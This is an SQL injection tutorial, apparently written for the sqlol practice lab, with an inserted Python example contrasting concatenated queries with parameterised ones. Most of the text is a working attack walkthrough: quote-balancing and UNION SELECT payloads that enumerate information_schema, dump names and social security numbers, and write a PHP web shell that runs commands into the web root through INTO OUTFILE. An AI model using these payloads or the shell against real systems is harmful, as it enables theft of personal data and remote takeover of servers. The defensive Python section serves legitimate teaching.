SQL Injection: Starting from the Basics

Blocking Apostrophe:
Values to Try
Find User or Parameter to inject

Name Herp Derper
# Try replacing the parameter value with a single quote (') or a double quote (") and see where it throws an error.

Detect Filtering

Name Herp 'Derper
# Trying the name value as Herp 'Derper instead of Herp Derper
    
Detect Vulnerability

Once a vulnerability is detected, or wherever the system throws an error, try to balance the query.

Earlier the query was as follows:

Select * from user where name='$input';
But we used a single quote in our input, so we get an error because of the extra quote; we need to neutralize it.

Now our input becomes:
' or '1'='1

Isadmin 2-1
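
As an added example (not part of the original post), the Python below runs the query above first built by string concatenation and then with bound parameters, so the effect of the inputs tried so far can be compared with the fix. It uses an in-memory SQLite database standing in for the page's MySQL target; the function names, the isadmin column and the sample rows are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; the isadmin column is an assumption.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (name TEXT, isadmin INTEGER)")
    db.executemany("INSERT INTO user VALUES (?, ?)",
                   [("Herp Derper", 1), ("Alice Example", 0), ("Bob Example", 0)])
    return db

def find_by_name_concat(db, name):
    # The page's query: input pasted between quotes in the SQL text.
    sql = "SELECT name FROM user WHERE name='" + name + "'"
    return sorted(r[0] for r in db.execute(sql))

def find_by_name_bound(db, name):
    # Placeholder: the driver passes the value as data, quotes included.
    sql = "SELECT name FROM user WHERE name=?"
    return sorted(r[0] for r in db.execute(sql, (name,)))

def find_by_admin_concat(db, isadmin):
    # Numeric context: no quote is needed to change the query.
    sql = "SELECT name FROM user WHERE isadmin=" + isadmin
    return sorted(r[0] for r in db.execute(sql))

def find_by_admin_bound(db, isadmin):
    # Reject anything that is not an integer, then bind the integer.
    try:
        flag = int(isadmin)
    except ValueError:
        return None
    sql = "SELECT name FROM user WHERE isadmin=?"
    return sorted(r[0] for r in db.execute(sql, (flag,)))

if __name__ == "__main__":
    db = make_db()
    for value in ("Herp Derper", "' or '1'='1", "Herp 'Derper"):
        try:
            unsafe = find_by_name_concat(db, value)
        except sqlite3.OperationalError as exc:
            unsafe = "SQL error: %s" % exc
        print(repr(value), "| concat:", unsafe, "| bound:", find_by_name_bound(db, value))
    for value in ("1", "2-1"):
        print(repr(value), "| concat:", find_by_admin_concat(db, value),
              "| bound:", find_by_admin_bound(db, value))
```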

Test for 1 Column Returned

Name Herp Derper
Isadmin 1 UNION SELECT Null #

Test for 2 Columns Returned

Name Herp Derper
Isadmin 1 UNION SELECT Null, Null #

Find Database Names

Name Herp Derper
Isadmin 1 UNION SELECT Null,table_schema FROM information_schema.tables #

Find Tables in sqlol Database

Name Herp Derper
Isadmin 1 UNION SELECT Null, table_name FROM information_schema.tables WHERE table_schema='sqlol' #

Find Columns within ssn Table

Name Herp Derper
Isadmin 1 UNION SELECT Null, column_name FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol' #

Dump Names and SSNs

Name Herp Derper
Isadmin 1 UNION SELECT Null, concat(name, ':', ssn) FROM sqlol.ssn #

Upload a PHP Shell

Name Herp Derper
Isadmin 1 UNION SELECT Null, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell17.php' #
